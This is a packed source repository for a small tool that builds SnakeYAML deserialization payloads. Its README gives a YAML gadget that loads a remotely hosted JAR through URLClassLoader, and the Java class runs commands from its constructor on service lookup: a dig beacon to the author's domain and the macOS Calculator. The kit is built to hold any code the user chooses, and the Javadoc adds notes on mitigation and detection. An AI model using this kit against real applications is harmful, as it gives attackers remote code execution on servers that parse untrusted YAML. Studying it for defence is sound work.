├── .gitignore
├── README.md
└── src
    ├── META-INF
    │   └── services
    │       └── javax.script.ScriptEngineFactory
    └── artsploit
        └── AwesomeScriptEngineFactory.java
/.gitignore:
--------------------------------------------------------------------------------
.idea/*
./out/*
./yaml-payload.jar
./yaml-payload.yml
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
A tiny project for generating payloads for the SnakeYAML deserialization gadget (taken from https://github.com/mbechler/marshalsec):
```yaml
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
]]
]
```
Put the java code you want to execute into [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory.java) and compile:
```bash
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
```

Then place the 'yaml-payload.jar' file into the web server folder (e.g.
artsploit.com/yaml-payload.jar)

--------------------------------------------------------------------------------
/src/META-INF/services/javax.script.ScriptEngineFactory:
--------------------------------------------------------------------------------
artsploit.AwesomeScriptEngineFactory
--------------------------------------------------------------------------------
/src/artsploit/AwesomeScriptEngineFactory.java:
--------------------------------------------------------------------------------
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

/**
 * Stub {@link ScriptEngineFactory} whose only real behaviour is in its constructor.
 *
 * <p>The class name is listed in {@code META-INF/services/javax.script.ScriptEngineFactory}, so the
 * JDK's service-provider lookup instantiates it as soon as a {@code javax.script.ScriptEngineManager}
 * is created with a class loader that can see this JAR; the YAML document in the README builds exactly
 * that manager over a {@code java.net.URLClassLoader} pointing at the remotely hosted JAR. No engine is
 * ever supplied: every interface method below returns {@code null}.
 *
 * <p>From the defensive side this is the tail end of a SnakeYAML deserialization chain: untrusted
 * YAML parsed with a constructor that honours arbitrary {@code !!} class tags, a JAR fetched over
 * HTTP, and code running from a provider constructor. Parsing with SnakeYAML's {@code SafeConstructor}
 * (or otherwise refusing arbitrary class tags) and denying outbound HTTP from the JVM each break the
 * chain before this class is ever loaded.
 */
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    /**
     * Runs when the provider is instantiated by the service lookup; this is the trigger point.
     *
     * <p>Two child processes are started: a {@code dig} DNS query for a host under the author's
     * domain (an out-of-band beacon showing the code ran) and the macOS Calculator binary as a
     * visible proof of execution. Both show up in process-creation telemetry as children of the
     * JVM, which is the detection signal for this gadget. An {@link IOException} is only printed;
     * if the first call throws (for example because {@code dig} is absent), the second is skipped.
     */
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /** No engine name is provided; always {@code null}. */
    @Override
    public String getEngineName() {
        return null;
    }

    /** No engine version is provided; always {@code null}. */
    @Override
    public String getEngineVersion() {
        return null;
    }

    /** Always {@code null}. Declared as a raw {@code List}; the interface's {@code List<String>} erases to the same signature. */
    @Override
    public List getExtensions() {
        return null;
    }

    /** Always {@code null} (raw {@code List}, see {@link #getExtensions()}). */
    @Override
    public List getMimeTypes() {
        return null;
    }

    /** Always {@code null} (raw {@code List}, see {@link #getExtensions()}). */
    @Override
    public List getNames() {
        return null;
    }

    /** No language name is provided; always {@code null}. */
    @Override
    public String getLanguageName() {
        return null;
    }

    /** No language version is provided; always {@code null}. */
    @Override
    public String getLanguageVersion() {
        return null;
    }

    /** Always {@code null}; no parameter is exposed for any key. */
    @Override
    public Object getParameter(String key) {
        return null;
    }

    /** Always {@code null}; no call syntax is generated. */
    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    /** Always {@code null}; no output statement is generated. */
    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    /** Always {@code null}; no program is generated. */
    @Override
    public String getProgram(String... statements) {
        return null;
    }

    /** Always {@code null}: this factory never produces a {@link ScriptEngine}. */
    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}
--------------------------------------------------------------------------------